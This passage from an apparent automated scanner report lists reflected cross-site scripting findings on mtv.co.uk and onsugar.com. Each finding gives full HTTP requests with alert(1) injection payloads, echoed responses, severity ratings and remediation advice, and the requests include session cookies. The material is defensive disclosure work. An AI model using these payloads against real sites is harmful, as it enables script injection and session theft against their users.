Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:32 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:32 GMT
Date: Mon, 12 Sep 2011 12:50:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/b14d0"-alert(1)-"2105664c6ae");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.116. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/blackberry.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/blackberry.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfba0"-alert(1)-"2c6339de47 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/bfba0"-alert(1)-"2c6339de47 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13429
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:37 GMT
Date: Mon, 12 Sep 2011 12:50:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/bfba0"-alert(1)-"2c6339de47");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.117. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/bodyform.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/bodyform.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff1e"-alert(1)-"e7d91e0ee6e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/2ff1e"-alert(1)-"e7d91e0ee6e HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:38 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/2ff1e"-alert(1)-"e7d91e0ee6e");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.118. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/nokiaSessions.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/nokiaSessions.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88536"-alert(1)-"237f981c1a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/88536"-alert(1)-"237f981c1a HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:37 GMT
Debug: lnioxp008wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13425
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:38 GMT
Date: Mon, 12 Sep 2011 12:50:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/88536"-alert(1)-"237f981c1a");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.119. http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/seat.swf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/flash/seat.swf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2b51"-alert(1)-"b39b60171d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/flash/f2b51"-alert(1)-"b39b60171d6 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/sites/all/themes/mtvuk/flash/615x340_flashbox_homepage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no; mbox=check#true#1315849806|session#1315849745071-758641#1315851606; __utma=1.1912579960.1315849746.1315849746.1315849746.1; __utmb=1.1.9.1315849746; __utmc=1; __utmz=1.1315849746.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases; __utma=181901947.1039012659.1315849756.1315849756.1315849756.1; __utmb=181901947.1.10.1315849756; __utmc=181901947; __utmz=181901947.1315849756.1.1.utmcsr=drupal.org|utmccn=(referral)|utmcmd=referral|utmcct=/cases

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:41 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13427
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:41 GMT
Date: Mon, 12 Sep 2011 12:50:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
cher();
com.mtvi.util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/flash/f2b51"-alert(1)-"b39b60171d6");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.120. http://www.mtv.co.uk/sites/all/themes/mtvuk/subthemes/default_homepage/style.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.co.uk
Path:   /sites/all/themes/mtvuk/subthemes/default_homepage/style.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8a26"-alert(1)-"fe7e87ae90 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themes/mtvuk/subthemes/default_homepage/a8a26"-alert(1)-"fe7e87ae90?1236968319 HTTP/1.1
Host: www.mtv.co.uk
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-mobile-detected=no

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 12:50:04 GMT
Debug: lnioxp009wuk
Content-Type: text/html; charset=utf-8
Content-Length: 13467
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 12:50:04 GMT
Date: Mon, 12 Sep 2011 12:50:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:msgr
...[SNIP]...
util.addOnloadEvent(function(){dispatcher.registerLinks()});
dispatcher.setAttribute("channel", "generic");
dispatcher.setAttribute("prop1", "/sites/all/themes/mtvuk/subthemes/default_homepage/a8a26"-alert(1)-"fe7e87ae90");
dispatcher.setAttribute("prop3", "generic");
//dispatcher.setAttribute("prop4", logged_in);
dispatcher.setAttribute("prop6", "");
dispatcher.setAttribute("prop10", "");
dispatc
...[SNIP]...

2.121. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b038"-alert(1)-"d884786df1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /modules/facebook_connect/4b038"-alert(1)-"d884786df1d HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web017-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832637%7CniqThxHrFM6F9um5QMGO0Ha%2F900oOKaea4pFhHEg4fO%2BNyXxQL5KKlHaibhzlVJ9UAEElI6baYteQrbTmlbjWhBTc7kk9vrEDtgGCkCuGSH0545XXfw14KzbHDFnWXT%2B9GpovDipRdhalTg4v5aLt%2BbYGO8otzFEahOJ8nzQ6f3X4cS6fS%2FhDLpvmR%2Fj8BUhKyvPN%2B5kKDVxMtlnpFevWQ%3D%3D%7C440dec8fa777e1eb7ee9a1eda4d09f02ca35174c; expires=Wed, 05-Oct-2011 16:37:17 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:57 GMT
Server: lighttpd/1.4.26
Content-Length: 7693

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<script>
var comscoreHash = "1c7d7144c7463cf0849f3154cfa5b81d";
COMSCORE.beacon({
c1:2,
c2:6035900,
c3:"",
c4:"www.onsugar.com/modules/facebook_connect/4b038"-alert(1)-"d884786df1d",
c5:"",
c6:"",
c15:comscoreHash
});
</script>
...[SNIP]...

2.122. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /modules/facebook_connect/xd_receiver.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53383"><script>alert(1)</script>15a9ee32b04 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/facebook_connect/53383"><script>alert(1)</script>15a9ee32b04 HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=8f072b21dbdc4e39c5d76aad0538c9d6&extern=0&channel=http%3A%2F%2Fwww.onsugar.com%2Fmodules%2Ffacebook_connect%2Fxd_receiver.php&locale=en_US
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1; __utma=191106292.423945842.1315850649.1315850649.1315850649.1; __utmb=191106292.2.10.1315850649; __utmc=191106292; __utmz=191106292.1315850649.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1847238086-1315850649395

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web015-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832636%7CnrCFFU5HiGaDcKE22GGcSWnNcIXj2hbzsDv2wu7rlIzzk6DwOI%2FLfUo46NrmlZik4ydq1Il8xCtLWdfstVMAyq%2B%2Baj4E7u%2FAFq9%2B6eHrUycU9M3q%2BIoJrxeOSJv94nqYJSjuszq6LHAUaKfixPBP8FbgPE%2FcknrtnYYHv5hOL0cyj6dyCLRY6WECpUvGWHOyX3w1ixrbGh2FODyUaJ6lSg%3D%3D%7Cd0d75e3d96806545c20a7ac291cd8c7aa2a1fc20; expires=Wed, 05-Oct-2011 16:37:16 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:03:56 GMT
Server: lighttpd/1.4.26
Content-Length: 7798

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/modules/facebook_connect/53383"><script>alert(1)</script>15a9ee32b04&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.123. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d96"><script>alert(1)</script>5c26a4aba3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /statica4d96"><script>alert(1)</script>5c26a4aba3e/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

HTTP/1.1 404 Not Found
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Content-Type: text/html; charset=utf-8
Content-Language: en
Set-Cookie: ss1=0%7C1317832641%7Ca%2FtbvUs37Q9DtUqtr%2FBY3wsoFZJ6tC9NYob5X2Hi3sLWq8cjORAu%2F8ZB6BMvJLztS9GxF6JhuR7nQ%2Fu38AAUtGFZrcUBzXuKKwab%2BN8v0JA9dJUdmzea5V3Vqao0laNl46FCxLHMqi8ODVZ9YD9Dv%2BF%2BTKE8qe4M8bIYddu2FEq1UAb1ff16kYc0rK3AkJUtB5qwifdNRLN7dcmDG9d9vQ%3D%3D%7C4dc22acb678517f2a04aa1e67a1c489fc827297f; expires=Wed, 05-Oct-2011 16:37:21 GMT; path=/; httponly
Date: Mon, 12 Sep 2011 13:04:01 GMT
Server: lighttpd/1.4.26
Content-Length: 8116

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns:fb="http://www.facebook.
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6035900&c3=&c4=www.onsugar.com/statica4d96"><script>alert(1)</script>5c26a4aba3e/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36&c5=&c6=&c15=1c7d7144c7463cf0849f3154cfa5b81d&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

2.124. http://www.onsugar.com/static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.onsugar.com
Path:   /static/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4626a"-alert(1)-"62698f08092 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /static4626a"-alert(1)-"62698f08092/4c964%22%3E%3Cscript%3Ealert(1)%3C/script%3Efa900ede36?nids[]=1922398&p= HTTP/1.1
Host: www.onsugar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ss1=0%7C1317831675%7C1hzON%2FBtxw%2FSCTWuc9E0VzEd7ewMHVKNLgAYaD2MwleX5pc0bPQTAntYqpzAFqV01yTlYa%2FdPxdZGc0faXNdTWSGXo5pYGrMBdLoemKzNfmoJvotfETBMWiwVdyD7749Q19Xgek%2FoTWBurNkVhWVtGzkzfpHR0AMLNe2f9p8kAHRM2UqUmktKBfrRhwckev3goGEP4X44EFBnwqrI7jpEg%3D%3D%7C38bcbeecdf608d80f08c2ddda4e95201ecaec0a5; ss2=1

Response

